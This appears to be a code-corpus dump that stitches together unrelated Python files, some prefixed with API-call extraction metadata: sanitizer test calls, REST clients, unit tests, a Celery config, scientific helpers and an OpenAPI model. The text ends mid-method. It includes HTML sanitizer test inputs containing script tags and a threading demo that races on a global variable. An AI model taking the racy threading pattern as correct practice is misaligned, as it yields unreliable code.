'bleach.clean', 'bleach.clean', (['"""a <script>safe()</script> test"""'], {}), "('a <script>safe()</script> test')\n", (1642, 1676), False, 'import bleach\n'), ((1738, 1782), 'bleach.clean', 'bleach.clean', (['"""a <style>body{}</style> test"""'], {}), "('a <style>body{}</style> test')\n", (1750, 1782), False, 'import bleach\n'), ((1843, 1887), 'bleach.clean', 'bleach.clean', (['"""<em href="fail">no link</em>"""'], {}), '(\'<em href="fail">no link</em>\')\n', (1855, 1887), False, 'import bleach\n'), ((1944, 1971), 'bleach.clean', 'bleach.clean', (['"""an & entity"""'], {}), "('an & entity')\n", (1956, 1971), False, 'import bleach\n'), ((1999, 2026), 'bleach.clean', 'bleach.clean', (['"""an < entity"""'], {}), "('an < entity')\n", (2011, 2026), False, 'import bleach\n'), ((2076, 2117), 'bleach.clean', 'bleach.clean', (['"""tag < <em>and</em> entity"""'], {}), "('tag < <em>and</em> entity')\n", (2088, 2117), False, 'import bleach\n'), ((2136, 2157), 'bleach.clean', 'bleach.clean', (['"""&"""'], {}), "('&')\n", (2148, 2157), False, 
'import bleach\n'), ((2240, 2255), 'bleach.clean', 'bleach.clean', (['s'], {}), '(s)\n', (2252, 2255), False, 'import bleach\n'), ((2320, 2351), 'bleach.clean', 'bleach.clean', (['s'], {'tags': "['table']"}), "(s, tags=['table'])\n", (2332, 2351), False, 'import bleach\n'), ((2385, 2423), 'bleach.linkify', 'bleach.linkify', (['u"""<table>test</table>"""'], {}), "(u'<table>test</table>')\n", (2399, 2423), False, 'import bleach\n'), ((2449, 2489), 'bleach.clean', 'bleach.clean', (['u"""<p>test</p>"""'], {'tags': "['p']"}), "(u'<p>test</p>', tags=['p'])\n", (2461, 2489), False, 'import bleach\n'), ((2564, 2581), 'bleach.linkify', 'bleach.linkify', (['s'], {}), '(s)\n', (2578, 2581), False, 'import bleach\n'), ((2594, 2627), 'bleach.linkify', 'bleach.linkify', (['s'], {'nofollow': '(False)'}), '(s, nofollow=False)\n', (2608, 2627), False, 'import bleach\n'), ((2679, 2694), 'bleach.clean', 'bleach.clean', (['s'], {}), '(s)\n', (2691, 2694), False, 'import bleach\n'), ((2895, 2960), 'bleach.clean', 'bleach.clean', (['"""a test <em>with</em> <b>html</b> tags"""'], {'strip': '(True)'}), "('a test <em>with</em> <b>html</b> tags', strip=True)\n", (2907, 2960), False, 'import bleach\n'), ((3020, 3126), 'bleach.clean', 'bleach.clean', (['"""a test <em>with</em> <img src="http://example.com/"> <b>html</b> tags"""'], {'strip': '(True)'}), '(\n \'a test <em>with</em> <img src="http://example.com/"> <b>html</b> tags\',\n strip=True)\n', (3032, 3126), False, 'import bleach\n'), ((3228, 3267), 'bleach.clean', 'bleach.clean', (['s'], {'tags': "['p']", 'strip': '(True)'}), "(s, tags=['p'], strip=True)\n", (3240, 3267), False, 'import bleach\n'), ((3385, 3424), 'bleach.clean', 'bleach.clean', (['s'], {'tags': "['p']", 'strip': '(True)'}), "(s, tags=['p'], strip=True)\n", (3397, 3424), False, 'import bleach\n'), ((3585, 3629), 'bleach.clean', 'bleach.clean', (['s'], {'tags': "['p', 'a']", 'strip': '(True)'}), "(s, tags=['p', 'a'], strip=True)\n", (3597, 3629), False, 'import bleach\n'), ((3788, 3842), 'bleach.clean', 'bleach.clean', (['"""<b style="top:0"></b>"""'], {'attributes': 'ATTR'}), '(\'<b style="top:0"></b>\', attributes=ATTR)\n', (3800, 3842), False, 'import bleach\n'), ((3855, 3901), 'bleach.clean', 'bleach.clean', (['s'], {'attributes': 'ATTR', 'styles': 'STYLE'}), '(s, attributes=ATTR, styles=STYLE)\n', (3867, 3901), False, 'import bleach\n'), ((3914, 4001), 'bleach.clean', 'bleach.clean', (['"""<b style="top: 0; color: blue;"></b>"""'], {'attributes': 'ATTR', 'styles': 'STYLE'}), '(\'<b style="top: 0; color: blue;"></b>\', attributes=ATTR,\n styles=STYLE)\n', (3926, 4001), False, 'import bleach\n'), ((4239, 4258), 'bleach.clean', 'bleach.clean', (['clean'], {}), '(clean)\n', (4251, 4258), False, 'import bleach\n'), ((4312, 4334), 'bleach.linkify', 'bleach.linkify', (['linked'], {}), '(linked)\n', (4326, 4334), False, 'import bleach\n'), ((4503, 4544), 'bleach.clean', 'bleach.clean', (['dirty'], {'attributes': "['class']"}), "(dirty, attributes=['class'])\n", (4515, 4544), False, 'import bleach\n'), ((4868, 4914), 'bleach.clean', 'bleach.clean', (['dirty'], {'tags': 'TAG', 'attributes': 'ATTR'}), '(dirty, tags=TAG, attributes=ATTR)\n', (4880, 4914), False, 'import bleach\n'), ((5073, 5092), 'bleach.clean', 'bleach.clean', (['dirty'], {}), '(dirty)\n', (5085, 5092), False, 'import bleach\n')]
|
import requests
class SimpleClassifier(object):
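    """Thin JSON-over-HTTP client for a picture-classification REST service."""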
def __init__(self, **kwargs):
self.host = kwargs.get('host', "localhost")
self.port = kwargs.get('port', 8080)
self.proto = kwargs.get('proto', "http")
self.uri = "{}://{}:{}".format(self.proto, self.host, self.port)
self.datasets = self.init_datasets()
def init_datasets(self):
return SimpleClassifier.Datasets(self)
def json_query(self, path, method, **kwargs):
r = requests.request(method, self.uri + path, json=kwargs)
return r.json()
class Datasets(object):
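        """Wrapper for the /datasets endpoints: create, list, delete, add pictures, train, classify."""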
def __init__(self, classifier):
self.classifier = classifier
def get(self, dataset=None):
path = '/datasets'
if dataset:
path = path + '/' + dataset
result = self.classifier.json_query(path, 'GET')
return result
def create(self, name):
result = self.classifier.json_query('/datasets', 'PUT', name=name)
return result
def delete(self, name):
path = '/datasets/' + name
result = self.classifier.json_query(path, 'DELETE')
return result
def addPicture(self, dataset, **kwargs):
result = {}
urls = kwargs.get('urls', [])
label = kwargs.get('label')
path = '/datasets/' + dataset + '/' + label
if not isinstance(urls, list):
if isinstance(urls, str):
urls = [urls]
result = self.classifier.json_query(path, 'PUT', urls=urls)
return result
def train(self, dataset, **kwargs):
path = '/datasets/' + dataset + '/train'
result = self.classifier.json_query(path, 'POST', **kwargs)
return result
def classify(self, dataset, **kwargs):
path = '/datasets/' + dataset + '/label'
result = self.classifier.json_query(path, 'POST', **kwargs)
return result
|
[
"requests.request"
] |
[((492, 546), 'requests.request', 'requests.request', (['method', '(self.uri + path)'], {'json': 'kwargs'}), '(method, self.uri + path, json=kwargs)\n', (508, 546), False, 'import requests\n')]
|
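A minimal usage sketch for the client above, assuming the classifier service is reachable; the dataset name, label, and URLs are placeholders, and the JSON body keys accepted by train/classify depend on the server:

client = SimpleClassifier(host="localhost", port=8080)
client.datasets.create("pets")                 # PUT /datasets
client.datasets.addPicture("pets", label="cat",
                           urls="http://example.com/cat.jpg")
client.datasets.train("pets")                  # POST /datasets/pets/train
print(client.datasets.classify("pets", urls=["http://example.com/query.jpg"]))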
from brainly_scraper import brainly
cyan = '\x1b[36m'
white = '\x1b[37m'
def start():
banners = """
{} ____ _ _
| __ ) _ __ __ _(_)_ __ | |_ _
| _ \| '__/ _` | | '_ \| | | | |
| |_) | | | (_| | | | | | | |_| |
|____/|_| \__,_|_|_| |_|_|\__, | {}Made By X-Nabil354
{} |___/ {}Brainly-CLI V1
""".format(cyan, white, cyan, white)
print(banners)
if __name__=='__main__':
start()
while True:
try:
        tanya = input('{}Enter your question: {}'.format(cyan, white))
        scrap = brainly(tanya, 5)
        for i in scrap:
            for answer in i.answers:
                # the separator template takes two colours; the third argument was unused
                print('{}'.format(white) + answer.content + '{}\n\n----------------------\n\n{}'.format(cyan, white))
    except KeyboardInterrupt:
        print('{}\nOkay, bye...'.format(cyan))
exit()
|
[
"brainly_scraper.brainly"
] |
[((594, 611), 'brainly_scraper.brainly', 'brainly', (['tanya', '(5)'], {}), '(tanya, 5)\n', (601, 611), False, 'from brainly_scraper import brainly\n')]
|
"""
Unit tests for the atom ID filter
"""
from __future__ import absolute_import
from __future__ import unicode_literals
import unittest
import numpy as np
from ....system import lattice
from .. import atomIdFilter
from .. import base
################################################################################
class TestAtomId(unittest.TestCase):
"""
Test atom ID filter
"""
def setUp(self):
"""
Called before each test
"""
# generate lattice
self.lattice = lattice.Lattice()
self.lattice.addAtom("Au", [0,0,0], 0.0)
self.lattice.addAtom("Au", [1,0,0], 0.0)
self.lattice.addAtom("Au", [0,1,0], 0.0)
self.lattice.addAtom("Au", [0,0,1], 0.0)
self.lattice.addAtom("Au", [1,1,0], 0.0)
self.lattice.addAtom("Au", [0,1,1], 0.0)
self.lattice.addAtom("Au", [1,1,1], 0.0)
self.lattice.addAtom("Au", [2,0,0], 0.0)
self.lattice.addAtom("Au", [0,2,0], 0.0)
self.lattice.addAtom("Au", [0,0,2], 0.0)
# filter
self.filter = atomIdFilter.AtomIdFilter("Atom ID")
def tearDown(self):
"""
Called after each test
"""
# remove refs
self.lattice = None
self.filter = None
def test_atomID(self):
"""
Atom ID filter
"""
# settings
settings = atomIdFilter.AtomIdFilterSettings()
settings.updateSetting("filterString", "0")
# set PBC
self.lattice.PBC[:] = 1
# filter input
filterInput = base.FilterInput()
filterInput.inputState = self.lattice
visibleAtoms = np.arange(self.lattice.NAtoms, dtype=np.int32)
filterInput.visibleAtoms = visibleAtoms
filterInput.NScalars = 0
filterInput.fullScalars = np.empty(0, np.float64)
filterInput.NVectors = 0
filterInput.fullVectors = np.empty(0, np.float64)
filterInput.ompNumThreads = 1
# call filter
result = self.filter.apply(filterInput, settings)
self.assertIsInstance(result, base.FilterResult)
# make sure num visible is correct
self.assertEqual(len(visibleAtoms), 1)
# check position is correct
self.assertListEqual(list(self.lattice.atomPos(visibleAtoms[0])), [0,0,0])
# settings
settings = atomIdFilter.AtomIdFilterSettings()
settings.updateSetting("filterString", "1-3, 8")
# set PBC
self.lattice.PBC[:] = 1
# filter input
filterInput = base.FilterInput()
filterInput.inputState = self.lattice
visibleAtoms = np.arange(self.lattice.NAtoms, dtype=np.int32)
filterInput.visibleAtoms = visibleAtoms
filterInput.NScalars = 0
filterInput.fullScalars = np.empty(0, np.float64)
filterInput.NVectors = 0
filterInput.fullVectors = np.empty(0, np.float64)
filterInput.ompNumThreads = 1
# call filter
result = self.filter.apply(filterInput, settings)
self.assertIsInstance(result, base.FilterResult)
# make sure num visible is correct
self.assertEqual(len(visibleAtoms), 4)
# check position is correct
self.assertListEqual(list(self.lattice.atomPos(visibleAtoms[0])), [1,0,0])
self.assertListEqual(list(self.lattice.atomPos(visibleAtoms[1])), [0,1,0])
self.assertListEqual(list(self.lattice.atomPos(visibleAtoms[2])), [0,0,1])
self.assertListEqual(list(self.lattice.atomPos(visibleAtoms[3])), [0,2,0])
|
[
"numpy.empty",
"numpy.arange"
] |
[((1719, 1765), 'numpy.arange', 'np.arange', (['self.lattice.NAtoms'], {'dtype': 'np.int32'}), '(self.lattice.NAtoms, dtype=np.int32)\n', (1728, 1765), True, 'import numpy as np\n'), ((1881, 1904), 'numpy.empty', 'np.empty', (['(0)', 'np.float64'], {}), '(0, np.float64)\n', (1889, 1904), True, 'import numpy as np\n'), ((1972, 1995), 'numpy.empty', 'np.empty', (['(0)', 'np.float64'], {}), '(0, np.float64)\n', (1980, 1995), True, 'import numpy as np\n'), ((2748, 2794), 'numpy.arange', 'np.arange', (['self.lattice.NAtoms'], {'dtype': 'np.int32'}), '(self.lattice.NAtoms, dtype=np.int32)\n', (2757, 2794), True, 'import numpy as np\n'), ((2910, 2933), 'numpy.empty', 'np.empty', (['(0)', 'np.float64'], {}), '(0, np.float64)\n', (2918, 2933), True, 'import numpy as np\n'), ((3001, 3024), 'numpy.empty', 'np.empty', (['(0)', 'np.float64'], {}), '(0, np.float64)\n', (3009, 3024), True, 'import numpy as np\n')]
|
from utils import Session
def test_visuals_public_course():
student = Session("student")
# Get all course data with visuals enabled
courses_with_visuals = student.get("/public/courses/visuals-list")["courses"]
# Iterate over courses, generating visuals for each
for course in courses_with_visuals:
# Pull course id
course_id = course["id"]
# Get the course visual
usage = student.get(
f"/public/visuals/course/{course_id}",
return_request=True,
skip_verify=True,
)
# Just make sure it didn't 500
assert usage.headers['Content-Type'] == 'image/png'
assert usage.status_code == 200
def test_visuals_public_playgrounds():
student = Session("student")
# Get the course visual
usage = student.get(
f"/public/visuals/playgrounds",
return_request=True,
skip_verify=True,
)
# Just make sure it didn't 500
assert usage.headers['Content-Type'] == 'image/png'
assert usage.status_code == 200
def test_visuals_public_active():
student = Session("student")
for days, step in [(14, 1), (90, 7), (180, 1), (365, 30)]:
# Get the course visual
usage = student.get(
f"/public/visuals/active/{days}/{step}",
return_request=True,
skip_verify=True,
)
# Just make sure it didn't 500
assert usage.headers['Content-Type'] == 'image/png'
assert usage.status_code == 200
def test_visuals_public_users():
student = Session("student")
for days, step in [(365, 1), (365, 30)]:
# Get the course visual
r = student.get(
f"/public/visuals/users/{days}/{step}",
return_request=True,
skip_verify=True,
)
# Just make sure it didn't 500
assert r.headers['Content-Type'] == 'image/png'
assert r.status_code == 200
|
[
"utils.Session"
] |
[((76, 94), 'utils.Session', 'Session', (['"""student"""'], {}), "('student')\n", (83, 94), False, 'from utils import Session\n'), ((762, 780), 'utils.Session', 'Session', (['"""student"""'], {}), "('student')\n", (769, 780), False, 'from utils import Session\n'), ((1114, 1132), 'utils.Session', 'Session', (['"""student"""'], {}), "('student')\n", (1121, 1132), False, 'from utils import Session\n'), ((1573, 1591), 'utils.Session', 'Session', (['"""student"""'], {}), "('student')\n", (1580, 1591), False, 'from utils import Session\n')]
|
# Import the Celery class from the package you just installed
from celery import Celery
# Create the application object from the imported Celery class
celery_app = Celery('meiduo')
celery_app.config_from_object('celery_tasks.config')
# Let celery_app automatically discover tasks under the given package path,
# i.e. auto-register the tasks modules
celery_app.autodiscover_tasks(['celery_tasks.sms'])
|
[
"celery.Celery"
] |
[((79, 95), 'celery.Celery', 'Celery', (['"""meiduo"""'], {}), "('meiduo')\n", (85, 95), False, 'from celery import Celery\n')]
|
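A sketch of a task module that this configuration would pick up; the module path and task body are assumptions (autodiscover_tasks looks for a tasks module under celery_tasks.sms):

# celery_tasks/sms/tasks.py (hypothetical location)
from celery_tasks.main import celery_app  # wherever the app above is defined

@celery_app.task(name='send_sms_code')
def send_sms_code(mobile, sms_code):
    # placeholder body; a real task would call an SMS gateway here
    print('sending code %s to %s' % (sms_code, mobile))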
# ch1/example2.py
import concurrent.futures
from timeit import default_timer as timer
# sequential
def f(x):
return x * x - x + 1
start = timer()
result = 3
for i in range(20):
result = f(result)
print('Result is very large. Only printing the last 5 digits:', result % 100000)
print('Sequential took: %.2f seconds.' % (timer() - start))
# concurrent
def concurrent_f(x):
global result
result = f(result)
result = 3
start = timer()  # restart the clock so only the concurrent run is timed
with concurrent.futures.ThreadPoolExecutor(max_workers=20) as executor:
    futures = [executor.submit(concurrent_f, i) for i in range(20)]
    concurrent.futures.wait(futures)  # block until all submissions finish
print('Result is very large. Only printing the last 5 digits:', result % 100000)
print('Concurrent took: %.2f seconds.' % (timer() - start))
|
[
"timeit.default_timer"
] |
[((146, 153), 'timeit.default_timer', 'timer', ([], {}), '()\n', (151, 153), True, 'from timeit import default_timer as timer\n'), ((332, 339), 'timeit.default_timer', 'timer', ([], {}), '()\n', (337, 339), True, 'from timeit import default_timer as timer\n'), ((752, 759), 'timeit.default_timer', 'timer', ([], {}), '()\n', (757, 759), True, 'from timeit import default_timer as timer\n')]
|
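Note that the threaded version above races twenty updates of a single global, so it demonstrates contention rather than speed-up. For contrast, a minimal sketch applying f to independent inputs with executor.map, which involves no shared state:

with concurrent.futures.ThreadPoolExecutor(max_workers=20) as executor:
    # map preserves input order and collects one result per input
    values = list(executor.map(f, range(20)))
print(values[:5])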
# Copyright 2018 D-Wave Systems Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# ================================================================================================
import unittest
import itertools
import dimod
class TestStructuredClass(unittest.TestCase):
def test_instantiation_base_class(self):
with self.assertRaises(TypeError):
dimod.Structured()
def test_adjacency_property(self):
class Dummy(dimod.Structured):
@property
def nodelist(self):
return list(range(5))
@property
def edgelist(self):
return list(itertools.combinations(self.nodelist, 2))
sampler = Dummy()
for u, v in sampler.edgelist:
self.assertIn(u, sampler.adjacency[v])
self.assertIn(v, sampler.adjacency[u])
for u in sampler.adjacency:
for v in sampler.adjacency[u]:
self.assertTrue((u, v) in sampler.edgelist or (v, u) in sampler.edgelist)
# check that we are not rebuilding each time
self.assertIs(sampler.adjacency, sampler.adjacency)
def test_structured_property(self):
class Dummy(dimod.Structured):
@property
def nodelist(self):
return [0, 1]
@property
def edgelist(self):
return [(0, 1)]
sampler = Dummy()
self.assertEqual(sampler.structure.nodelist, [0, 1])
self.assertEqual(sampler.structure.edgelist, [(0, 1)])
self.assertEqual(sampler.structure.adjacency, {0: {1}, 1: {0}})
def test_networkx_graph(self):
try:
import networkx as nx
except ImportError:
            self.skipTest("No NetworkX installed.")  # skipTest raises SkipTest itself
# Create simple NetworkX graph to compare to
nxG = nx.Graph()
for i in range(5):
nxG.add_node(i)
nxG.add_edge(0,1)
nxG.add_edge(1,2)
nxG.add_edge(2,3)
# Create NetworkX graph from structured sampler
class Dummy(dimod.Structured):
@property
def nodelist(self):
return list(range(5))
@property
def edgelist(self):
return [(0,1),(1,2),(2,3)]
sampler = Dummy()
G = sampler.to_networkx_graph()
self.assertEqual(set(nxG), set(G))
for u, v in nxG.edges:
self.assertIn(u, G[v])
|
[
"itertools.combinations",
"dimod.Structured",
"networkx.Graph"
] |
[((2393, 2403), 'networkx.Graph', 'nx.Graph', ([], {}), '()\n', (2401, 2403), True, 'import networkx as nx\n'), ((907, 925), 'dimod.Structured', 'dimod.Structured', ([], {}), '()\n', (923, 925), False, 'import dimod\n'), ((1180, 1220), 'itertools.combinations', 'itertools.combinations', (['self.nodelist', '(2)'], {}), '(self.nodelist, 2)\n', (1202, 1220), False, 'import itertools\n')]
|
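A standalone sketch of the mixin contract the tests above exercise: a subclass supplies only nodelist and edgelist, and adjacency/structure are derived (PathSampler is a hypothetical name):

import dimod

class PathSampler(dimod.Structured):
    @property
    def nodelist(self):
        return [0, 1, 2]
    @property
    def edgelist(self):
        return [(0, 1), (1, 2)]

sampler = PathSampler()
print(sampler.adjacency)           # {0: {1}, 1: {0, 2}, 2: {1}}
print(sampler.structure.nodelist)  # [0, 1, 2]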
"""
Filename: cartesian.py
Authors: <NAME>
Implements cartesian products and regular cartesian grids.
"""
import numpy
from numba import njit
def cartesian(nodes, order="C"):
"""Cartesian product of a list of arrays
Parameters:
-----------
nodes: (list of 1d-arrays)
order: ('C' or 'F') order in which the product is enumerated
Returns:
--------
out: (2d-array) each line corresponds to one point of the product space
"""
nodes = [numpy.array(e) for e in nodes]
shapes = [e.shape[0] for e in nodes]
n = len(nodes)
l = numpy.prod(shapes)
out = numpy.zeros((l, n))
if order == "C":
repetitions = numpy.cumprod([1] + shapes[:-1])
else:
shapes.reverse()
sh = [1] + shapes[:-1]
repetitions = numpy.cumprod(sh)
repetitions = repetitions.tolist()
repetitions.reverse()
for i in range(n):
_repeat_1d(nodes[i], repetitions[i], out[:, i])
return out
def mlinspace(a, b, nums, order="C"):
"""Constructs a regular cartesian grid
Parameters:
-----------
a: (1d-array) lower bounds in each dimension
b: (1d-array) upper bounds in each dimension
nums: (1d-array) number of nodes along each dimension
order: ('C' or 'F') order in which the product is enumerated
Returns:
--------
out: (2d-array) each line corresponds to one point of the product space
"""
a = numpy.array(a, dtype="float64")
b = numpy.array(b, dtype="float64")
nums = numpy.array(nums, dtype="int64")
nodes = [numpy.linspace(a[i], b[i], nums[i]) for i in range(len(nums))]
return cartesian(nodes, order=order)
@njit(cache=True)
def _repeat_1d(x, K, out):
"""Repeats each element of a vector many times and repeats the whole result many times
Parameters
----------
x: (1d array) vector to be repeated
K: (int) number of times each element of x is repeated (inner iterations)
out: (1d array) placeholder for the result
Returns
-------
None
"""
N = x.shape[0]
L = out.shape[0] // (K * N) # number of outer iterations
# K # number of inner iterations
# the result out should enumerate in C-order the elements
# of a 3-dimensional array T of dimensions (K,N,L)
# such that for all k,n,l, we have T[k,n,l] == x[n]
for n in range(N):
val = x[n]
for k in range(K):
for l in range(L):
ind = k * N * L + n * L + l
out[ind] = val
|
[
"numpy.cumprod",
"numba.njit",
"numpy.zeros",
"numpy.array",
"numpy.linspace",
"numpy.prod"
] |
[((1674, 1690), 'numba.njit', 'njit', ([], {'cache': '(True)'}), '(cache=True)\n', (1678, 1690), False, 'from numba import njit\n'), ((579, 597), 'numpy.prod', 'numpy.prod', (['shapes'], {}), '(shapes)\n', (589, 597), False, 'import numpy\n'), ((608, 627), 'numpy.zeros', 'numpy.zeros', (['(l, n)'], {}), '((l, n))\n', (619, 627), False, 'import numpy\n'), ((1437, 1468), 'numpy.array', 'numpy.array', (['a'], {'dtype': '"""float64"""'}), "(a, dtype='float64')\n", (1448, 1468), False, 'import numpy\n'), ((1477, 1508), 'numpy.array', 'numpy.array', (['b'], {'dtype': '"""float64"""'}), "(b, dtype='float64')\n", (1488, 1508), False, 'import numpy\n'), ((1520, 1552), 'numpy.array', 'numpy.array', (['nums'], {'dtype': '"""int64"""'}), "(nums, dtype='int64')\n", (1531, 1552), False, 'import numpy\n'), ((479, 493), 'numpy.array', 'numpy.array', (['e'], {}), '(e)\n', (490, 493), False, 'import numpy\n'), ((672, 704), 'numpy.cumprod', 'numpy.cumprod', (['([1] + shapes[:-1])'], {}), '([1] + shapes[:-1])\n', (685, 704), False, 'import numpy\n'), ((793, 810), 'numpy.cumprod', 'numpy.cumprod', (['sh'], {}), '(sh)\n', (806, 810), False, 'import numpy\n'), ((1566, 1601), 'numpy.linspace', 'numpy.linspace', (['a[i]', 'b[i]', 'nums[i]'], {}), '(a[i], b[i], nums[i])\n', (1580, 1601), False, 'import numpy\n')]
|
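A quick usage sketch for the two helpers above; the bounds and node counts are arbitrary:

grid = mlinspace([0.0, 0.0], [1.0, 1.0], [2, 3])
print(grid.shape)  # (6, 2): 2 x 3 nodes, one grid point per row

prod = cartesian([[1, 2], [10, 20, 30]])
print(prod.shape)  # (6, 2): every pairing of the two input vectors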
import pandas as pd
from random_forest.forest import Forest
def load():
df = pd.read_csv('../refrigerator_temp_time_series.csv')
df['temp'] = df['temp'].apply(lambda x: x.replace(',', '.')).astype(
'float64')
df['Ts'] = df['Ts'].apply(lambda x: x.replace(',', '.')).astype('float64')
df.rename(
columns={
"czas(min)": "time",
"alpha": "compressor",
"temp": 'ambient_temp',
"Ts": 'refrigerator_temp'},
inplace=True)
df.set_index('time', inplace=True)
return df
def delay(df, delay):
frames = [df.shift(-t) for t in range(delay)]
frames.append(df.iloc[:, -1:].diff().shift(-delay))
delayed_df = pd.concat(frames, axis=1).dropna()
return delayed_df
def test(df, iterations, data_to_test='fresh_data'):
prediction_err_sum = 0
naive_err_sum = 0
for _ in range(iterations):
fresh_data = df.sample(df.shape[0]//10)
training_data = df[~df.index.isin(fresh_data.index)]
forest = Forest(training_data)
if data_to_test == 'test_data':
test_data = fresh_data
else:
test_data = training_data
for test in test_data.values:
previous_temp = test[-2]
actual_value = previous_temp + test[-1]
prediction_err_sum += abs(
(forest.predict(test[:-1]) + previous_temp - actual_value) /
actual_value if actual_value else 0)
naive_err_sum += abs((previous_temp - actual_value) /
actual_value if actual_value else 0)
return naive_err_sum, prediction_err_sum, test_data.shape[0]
|
[
"pandas.read_csv",
"pandas.concat",
"random_forest.forest.Forest"
] |
[((83, 134), 'pandas.read_csv', 'pd.read_csv', (['"""../refrigerator_temp_time_series.csv"""'], {}), "('../refrigerator_temp_time_series.csv')\n", (94, 134), True, 'import pandas as pd\n'), ((1026, 1047), 'random_forest.forest.Forest', 'Forest', (['training_data'], {}), '(training_data)\n', (1032, 1047), False, 'from random_forest.forest import Forest\n'), ((705, 730), 'pandas.concat', 'pd.concat', (['frames'], {'axis': '(1)'}), '(frames, axis=1)\n', (714, 730), True, 'import pandas as pd\n')]
|
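A minimal end-to-end sketch wiring the three helpers above together; it assumes the CSV read by load() exists at its relative path, and the 3-step delay embedding is an arbitrary choice:

df = delay(load(), 3)
naive_err, pred_err, n = test(df, iterations=1, data_to_test='test_data')
print('naive relative error:', naive_err / n)
print('forest relative error:', pred_err / n)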
# coding: utf-8
"""
Argo Events
No description provided (generated by Openapi Generator https://github.com/openapitools/openapi-generator) # noqa: E501
The version of the OpenAPI document: v1.0.0
Generated by: https://openapi-generator.tech
"""
import pprint
import re # noqa: F401
import six
from argo.events.client.configuration import Configuration
class V1alpha1AWSLambdaTrigger(object):
"""NOTE: This class is auto generated by OpenAPI Generator.
Ref: https://openapi-generator.tech
Do not edit the class manually.
"""
"""
Attributes:
openapi_types (dict): The key is attribute name
and the value is attribute type.
attribute_map (dict): The key is attribute name
and the value is json key in definition.
"""
openapi_types = {
'access_key': 'V1SecretKeySelector',
'function_name': 'str',
'parameters': 'list[V1alpha1TriggerParameter]',
'payload': 'list[V1alpha1TriggerParameter]',
'region': 'str',
'secret_key': 'V1SecretKeySelector'
}
attribute_map = {
'access_key': 'accessKey',
'function_name': 'functionName',
'parameters': 'parameters',
'payload': 'payload',
'region': 'region',
'secret_key': 'secretKey'
}
def __init__(self, access_key=None, function_name=None, parameters=None, payload=None, region=None, secret_key=None, local_vars_configuration=None): # noqa: E501
"""V1alpha1AWSLambdaTrigger - a model defined in OpenAPI""" # noqa: E501
if local_vars_configuration is None:
local_vars_configuration = Configuration()
self.local_vars_configuration = local_vars_configuration
self._access_key = None
self._function_name = None
self._parameters = None
self._payload = None
self._region = None
self._secret_key = None
self.discriminator = None
if access_key is not None:
self.access_key = access_key
self.function_name = function_name
if parameters is not None:
self.parameters = parameters
self.payload = payload
self.region = region
if secret_key is not None:
self.secret_key = secret_key
@property
def access_key(self):
"""Gets the access_key of this V1alpha1AWSLambdaTrigger. # noqa: E501
:return: The access_key of this V1alpha1AWSLambdaTrigger. # noqa: E501
:rtype: V1SecretKeySelector
"""
return self._access_key
@access_key.setter
def access_key(self, access_key):
"""Sets the access_key of this V1alpha1AWSLambdaTrigger.
:param access_key: The access_key of this V1alpha1AWSLambdaTrigger. # noqa: E501
:type: V1SecretKeySelector
"""
self._access_key = access_key
@property
def function_name(self):
"""Gets the function_name of this V1alpha1AWSLambdaTrigger. # noqa: E501
FunctionName refers to the name of the function to invoke. # noqa: E501
:return: The function_name of this V1alpha1AWSLambdaTrigger. # noqa: E501
:rtype: str
"""
return self._function_name
@function_name.setter
def function_name(self, function_name):
"""Sets the function_name of this V1alpha1AWSLambdaTrigger.
FunctionName refers to the name of the function to invoke. # noqa: E501
:param function_name: The function_name of this V1alpha1AWSLambdaTrigger. # noqa: E501
:type: str
"""
if self.local_vars_configuration.client_side_validation and function_name is None: # noqa: E501
raise ValueError("Invalid value for `function_name`, must not be `None`") # noqa: E501
self._function_name = function_name
@property
def parameters(self):
"""Gets the parameters of this V1alpha1AWSLambdaTrigger. # noqa: E501
:return: The parameters of this V1alpha1AWSLambdaTrigger. # noqa: E501
:rtype: list[V1alpha1TriggerParameter]
"""
return self._parameters
@parameters.setter
def parameters(self, parameters):
"""Sets the parameters of this V1alpha1AWSLambdaTrigger.
:param parameters: The parameters of this V1alpha1AWSLambdaTrigger. # noqa: E501
:type: list[V1alpha1TriggerParameter]
"""
self._parameters = parameters
@property
def payload(self):
"""Gets the payload of this V1alpha1AWSLambdaTrigger. # noqa: E501
:return: The payload of this V1alpha1AWSLambdaTrigger. # noqa: E501
:rtype: list[V1alpha1TriggerParameter]
"""
return self._payload
@payload.setter
def payload(self, payload):
"""Sets the payload of this V1alpha1AWSLambdaTrigger.
:param payload: The payload of this V1alpha1AWSLambdaTrigger. # noqa: E501
:type: list[V1alpha1TriggerParameter]
"""
if self.local_vars_configuration.client_side_validation and payload is None: # noqa: E501
raise ValueError("Invalid value for `payload`, must not be `None`") # noqa: E501
self._payload = payload
@property
def region(self):
"""Gets the region of this V1alpha1AWSLambdaTrigger. # noqa: E501
Region is AWS region # noqa: E501
:return: The region of this V1alpha1AWSLambdaTrigger. # noqa: E501
:rtype: str
"""
return self._region
@region.setter
def region(self, region):
"""Sets the region of this V1alpha1AWSLambdaTrigger.
Region is AWS region # noqa: E501
:param region: The region of this V1alpha1AWSLambdaTrigger. # noqa: E501
:type: str
"""
if self.local_vars_configuration.client_side_validation and region is None: # noqa: E501
raise ValueError("Invalid value for `region`, must not be `None`") # noqa: E501
self._region = region
@property
def secret_key(self):
"""Gets the secret_key of this V1alpha1AWSLambdaTrigger. # noqa: E501
:return: The secret_key of this V1alpha1AWSLambdaTrigger. # noqa: E501
:rtype: V1SecretKeySelector
"""
return self._secret_key
@secret_key.setter
def secret_key(self, secret_key):
"""Sets the secret_key of this V1alpha1AWSLambdaTrigger.
:param secret_key: The secret_key of this V1alpha1AWSLambdaTrigger. # noqa: E501
:type: V1SecretKeySelector
"""
self._secret_key = secret_key
def to_dict(self):
"""Returns the model properties as a dict"""
result = {}
for attr, _ in six.iteritems(self.openapi_types):
value = getattr(self, attr)
if isinstance(value, list):
result[attr] = list(map(
lambda x: x.to_dict() if hasattr(x, "to_dict") else x,
value
))
elif hasattr(value, "to_dict"):
result[attr] = value.to_dict()
elif isinstance(value, dict):
result[attr] = dict(map(
lambda item: (item[0], item[1].to_dict())
if hasattr(item[1], "to_dict") else item,
value.items()
))
else:
result[attr] = value
return result
def to_str(self):
"""Returns the string representation of the model"""
return pprint.pformat(self.to_dict())
def __repr__(self):
"""For `print` and `pprint`"""
return self.to_str()
def __eq__(self, other):
